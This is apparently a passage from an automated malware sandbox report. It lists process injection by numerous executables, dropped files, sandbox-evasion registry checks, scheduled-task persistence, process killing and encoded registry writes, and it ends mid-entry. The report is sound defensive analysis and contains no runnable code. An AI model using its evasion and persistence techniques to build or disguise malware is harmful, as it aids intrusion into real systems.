OcB4jBzI70tFnRtK1WZB1Ocm.exexcW3TuSn3KSNmakFvG9gZQDx.exe9NDwiPlZEEhDGlkz9gl0UQAX.exeEF78.exeNvFMn_zIjzcOhCOAYPNfV55o.exe727C.exeD725.exeD725.exebuild3.exemstsca.exemstsca.exemstsca.exemstsca.exeghdhvtsmstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exeD725.exemstsca.exemstsca.exemstsca.exeghdhvtsmstsca.exemstsca.exeD725.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exeD725.exemstsca.exemstsca.exemstsca.exedescription pid Process procid_target PID 4368 set thread context of 2768 4368 OcB4jBzI70tFnRtK1WZB1Ocm.exe 74 PID 3680 set thread context of 3436 3680 xcW3TuSn3KSNmakFvG9gZQDx.exe 80 PID 3196 set thread context of 3240 3196 9NDwiPlZEEhDGlkz9gl0UQAX.exe 97 PID 2496 set thread context of 344 2496 EF78.exe 109 PID 4972 set thread context of 3816 4972 NvFMn_zIjzcOhCOAYPNfV55o.exe 167 PID 5128 set thread context of 1528 5128 727C.exe 252 PID 5632 set thread context of 5360 5632 D725.exe 260 PID 5264 set thread context of 2372 5264 D725.exe 263 PID 1996 set thread context of 5464 1996 build3.exe 291 PID 3084 set thread context of 500 3084 mstsca.exe 303 PID 5804 set thread context of 5780 5804 mstsca.exe 309 PID 5540 set thread context of 4372 5540 mstsca.exe 318 PID 5376 set thread context of 792 5376 mstsca.exe 321 PID 400 set thread context of 224 400 ghdhvts 327 PID 4792 set thread context of 6072 4792 mstsca.exe 328 PID 1200 set thread context of 520 1200 mstsca.exe 333 PID 6392 set thread context of 6564 6392 mstsca.exe 349 PID 7076 set thread context of 5712 7076 mstsca.exe 382 PID 7112 set thread context of 7080 7112 mstsca.exe 387 PID 7084 set thread context of 7424 7084 mstsca.exe 392 PID 7744 set thread context of 7780 7744 mstsca.exe 397 PID 7996 set thread context of 8024 7996 D725.exe 399 PID 6472 set thread context of 6012 6472 mstsca.exe 404 PID 7572 set thread context of 7956 7572 mstsca.exe 406 PID 7392 set thread context of 7444 7392 mstsca.exe 410 PID 7548 set thread context of 4244 7548 ghdhvts 414 PID 6624 set thread context of 8168 6624 mstsca.exe 415 PID 4020 set thread context of 4384 4020 mstsca.exe 418 PID 4080 set thread context of 3212 4080 D725.exe 420 PID 7940 set thread context of 7436 7940 mstsca.exe 422 PID 6740 set thread context of 2124 6740 mstsca.exe 425 PID 7688 set thread context of 2220 7688 mstsca.exe 428 PID 7328 set thread context of 5904 7328 mstsca.exe 430 PID 2300 set thread context of 7880 2300 mstsca.exe 432 PID 4588 set thread context of 8096 4588 D725.exe 435 PID 3860 set thread context of 7592 3860 mstsca.exe 441 PID 2148 set thread context of 5604 2148 mstsca.exe 443 PID 3424 set thread context of 7516 3424 mstsca.exe 445 -
Drops file in Program Files directory 19 IoCs
Processes:
gXt9NtnPmMCRWaXBrQk8NfGb.exeDYbALA.exe1hlySlP9nisX71mJnP5mZ3Qa.exesetup.tmpdescription ioc Process File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe gXt9NtnPmMCRWaXBrQk8NfGb.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst3.exe gXt9NtnPmMCRWaXBrQk8NfGb.exe File created C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe.config DYbALA.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 1hlySlP9nisX71mJnP5mZ3Qa.exe File created C:\Program Files (x86)\FarLabUninstaller\Fafeduceji.exe.config DYbALA.exe File created C:\Program Files (x86)\FarLabUninstaller\is-T2CDF.tmp setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-SM4LU.tmp setup.tmp File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 1hlySlP9nisX71mJnP5mZ3Qa.exe File created C:\Program Files (x86)\FarLabUninstaller\is-989SV.tmp setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-898PO.tmp setup.tmp File opened for modification C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe gXt9NtnPmMCRWaXBrQk8NfGb.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe gXt9NtnPmMCRWaXBrQk8NfGb.exe File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini gXt9NtnPmMCRWaXBrQk8NfGb.exe File created C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe DYbALA.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe setup.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File created C:\Program Files (x86)\FarLabUninstaller\Fafeduceji.exe DYbALA.exe -
Drops file in Windows directory 21 IoCs
Processes:
exJBBJ57RhMwfX6V7rNCirtY.exeMicrosoftEdge.exeYLPxR1bFWYWLGzK0QEMH4Yaa.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc Process File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe exJBBJ57RhMwfX6V7rNCirtY.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\System\xxx1.bak YLPxR1bFWYWLGzK0QEMH4Yaa.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\Tasks\_eKJw2OFuLijigALN0RShv0q.exe exJBBJ57RhMwfX6V7rNCirtY.exe File created C:\Windows\Tasks\1b8d5943a444c5795689ec0f44e1ef6740db92da exJBBJ57RhMwfX6V7rNCirtY.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\System\svchost.exe YLPxR1bFWYWLGzK0QEMH4Yaa.exe File created C:\Windows\System\svchost.exe YLPxR1bFWYWLGzK0QEMH4Yaa.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\f8c8f1285d826bc63910aaf97db97186ba642b4f exJBBJ57RhMwfX6V7rNCirtY.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 2620 300 WerFault.exe 148 3640 300 WerFault.exe 148 4872 300 WerFault.exe 148 3256 300 WerFault.exe 148 3136 300 WerFault.exe 148 4092 300 WerFault.exe 148 5404 5168 WerFault.exe 193 5592 5168 WerFault.exe 193 5656 5168 WerFault.exe 193 5700 5168 WerFault.exe 193 5760 5168 WerFault.exe 193 5900 5168 WerFault.exe 193 5936 5168 WerFault.exe 193 5960 5168 WerFault.exe 193 -
NSIS installer 4 IoCs
Processes:
resource yara_rule behavioral1/files/0x000400000001ac1b-245.dat nsis_installer_1 behavioral1/files/0x000400000001ac1b-245.dat nsis_installer_2 behavioral1/files/0x000400000001ac1b-246.dat nsis_installer_1 behavioral1/files/0x000400000001ac1b-246.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 33 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
EF78.exe3E6B.exeghdhvtsMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeghdhvtsOcB4jBzI70tFnRtK1WZB1Ocm.exervdhvtsrvdhvtsdescription ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EF78.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3E6B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3E6B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI OcB4jBzI70tFnRtK1WZB1Ocm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EF78.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EF78.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 MicrosoftEdgeCP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI OcB4jBzI70tFnRtK1WZB1Ocm.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\000A MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 3E6B.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 MicrosoftEdgeCP.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rvdhvts Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI OcB4jBzI70tFnRtK1WZB1Ocm.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI ghdhvts Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 MicrosoftEdgeCP.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Soft1WW02.exe32E4.exeRYVmga2gCYCILuVDQzIlK5af.exemt5IRqNxCvOuLR7GM_no0d2t.exebuild.exeSetup.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Soft1WW02.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 32E4.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RYVmga2gCYCILuVDQzIlK5af.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mt5IRqNxCvOuLR7GM_no0d2t.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mt5IRqNxCvOuLR7GM_no0d2t.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Soft1WW02.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 32E4.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RYVmga2gCYCILuVDQzIlK5af.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 4052 schtasks.exe 896 schtasks.exe 4484 schtasks.exe 2192 schtasks.exe 4244 schtasks.exe 5720 schtasks.exe 1536 schtasks.exe 2372 schtasks.exe 3196 schtasks.exe 3024 schtasks.exe 2300 schtasks.exe 1828 schtasks.exe 2112 schtasks.exe 4304 schtasks.exe -
Delays execution with timeout.exe 7 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid Process 6100 timeout.exe 5520 timeout.exe 2832 timeout.exe 3272 timeout.exe 1288 timeout.exe 3056 timeout.exe 500 timeout.exe -
Discovers systems in the same network 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exedescription ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName MicrosoftEdgeCP.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName MicrosoftEdgeCP.exe -
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exenetstat.exepid Process 6188 ipconfig.exe 6912 netstat.exe -
Kills process with taskkill 10 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 2012 taskkill.exe 1500 taskkill.exe 4336 taskkill.exe 5572 taskkill.exe 3696 taskkill.exe 6108 taskkill.exe 4832 taskkill.exe 3236 taskkill.exe 5000 taskkill.exe 3328 taskkill.exe -
Processes:
MicrosoftEdgeCP.exeMicrosoftEdge.exebrowser_broker.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
explorer.exeexplorer.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c735230f3e51c97b59ca34f365fdbf666f9714cd0a44740d27820ba320ffa191ffb392cc93f347d3cc52d21ee681b8a77ed284d462c48df4e70a69ca2ad8cd844a39d499c14ec43364bf37a335077cb97ebea1d709902d4da5f421be70e5c8b7cb121062721e2fa055c3c1915b52bd4dc94ed30eba3579b5 explorer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c72b230f3e64cedb27bc7197b69f0ad0c2a30f9e5fc9986d1844ad381b6701184ca1e9a8a98de279d93b043a834a3497c00c58ceb387df54244ec3ad3eec58be018e51364df7492226b73f8909d7ff0c9a7b19a68b1089ddf9d6 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c735230f3e51c97b59ca34f365fcb66f639b16cd0a44740d27820ba320ffa191fbb593cc93f347d3cc52d21ee681b8a77ed284d462c48df4e70a69ca2ad8cd844a39d499c14ec43364bf37a335077cb97ebea1d709902d4da5f421be70e5c8b7cb121062721e2fa055c3c1915b52bd4dc94ed30eba3579b5 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\f9dbda9e = a3927173261beaf0674cadce3dcb504c42e5336165cda5f0e7f365c0e5c68a5a2f6afc16c07120d5891b637569979afad8dd25cd29d7e15467937e2c2ab17473dd1a1509774756f48eece6e3dddd7341378a9937530b8228880ada7e explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\f9dbda9e = a3927173261be756674cadce3dcb504c42e5336165cda5f0e7f365c0e5c68a5a2f6afc16c07120d5891b637569979afad8dd25cd29d7e15467937e2c2ab17473dd1a1509774756f48eece6e3dddd7341378a9937530b8228880ada7e explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\74f86db5 = 211dd65cd9c0d13f6a685154ef9c8047d8105dac146233975bd659de2f6a8d344a2f6d4e83ea2a0a540e5de6fd75d905d2b0ffb0cb5102d5ed3cec706e8e0bb799ff50b7d3ac0f133f1816fbd196abab85ceae4f7875e18bfafa1417d7a54fcc20e3d5696db849be explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c735230f3e51c97b59ca34f365fdbf666f9714cd0a44740d27820ba320fea898f7b395cc93f347d3cc52d21ee681b8a77ed284d462c48df4e70a69ca2ad8cd844a39d499c14ec43364bf37a335077cb97ebea1d709902d4da5f421be70e5c8b7cb121062721e2fa055c3c1915b52bd4dc94ed30eba3579b5 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c73c230f3e51c97b59cb7ef36af7b7646795128501467f0b29863dac8583d6d29960fa4020f602ba9063839a3b0adb37f8f243f20517af4a13a4898b570771937db4966e113353b7f9ceccb17a6400ed029623d243c5ad22405ef1d8488abc8526769c25dd6f3561d779328634ef07 explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c73c230f3e51c97b59cb7ef36af7b7646795128501467f092a813dac8583d6d29960fa4020f602ba9063839a3b0adb37f8f243f20517af4a13a4898b570771937db4966e113353b7f9ceccb17a6400ed029623d243c5ad22405ef1d8488abc8526769c25dd6f3561d779328634ef07 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs explorer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust explorer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates explorer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\4167bdfb = 00a419d3dae80a470da2c9d59995d8693c1cc9843159b9 explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\b9360293 = 3fc3509086e542aef6c633387b891d6675e316f5ed49bd727fdf6d9a3710c24d9fb4635c27b9d6aafdbf47a01905e26fb5bc12872e7eb387dfdff7264bdfa6e6c5fec1c85444269a466fc2f287f9603000ca62dc1b99991c75d26227649790e14ceabb7d0b2691d64f135498 explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\bb10243 = a1c735230f3e51c97b59ca34f365fcb66f649411cd0a44740d27820ba320ffa191fdb491cc93f347d3cc52d21ee681b8a77ed284d462c48df4e70a69ca2ad8cd844a39d499c14ec43364bf37a335077cb97ebea1d709902d4da5f421be70e5c8b7cb121062721e2fa055c3c1915b52bd4dc94ed30eba3579b5 explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\8692b568 = 6b94ba011c03ddeb94f2dde6e1ac30d1cc2429638f6f44b3050a4d37bfca582d0d8d34198d074f4d8bd1b1fb039d3de7691ea2559afe3dcf3e60044fbfeaf85f420b419045b808bb9d7a06697887d0194e172453 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA explorer.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs explorer.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\3c6ff271 = 6cb8812219223d3592780f21580fbf6bfe06f7c46a1eac36573d026032865c558ac98ecda575c4e2296d95698654dc299f97c5dfe358615bd12cf79bb5c25e1a949bfce535a8c52886c525163e8dd89481fa5581b4192e explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs explorer.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Jwnnxup\8692b568 = 6b94ba011c0386e594f2dde6e1ac30d1cc2429638f6f44b3050a4d37bfca582d0d8d34198d074f4d8bd1b1fb039d3de7691ea2559afe3dcf3e60044fbfeaf85f420b419045b808bb9d7a06697887d0194e172453 explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs explorer.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed explorer.exe Set value (data) 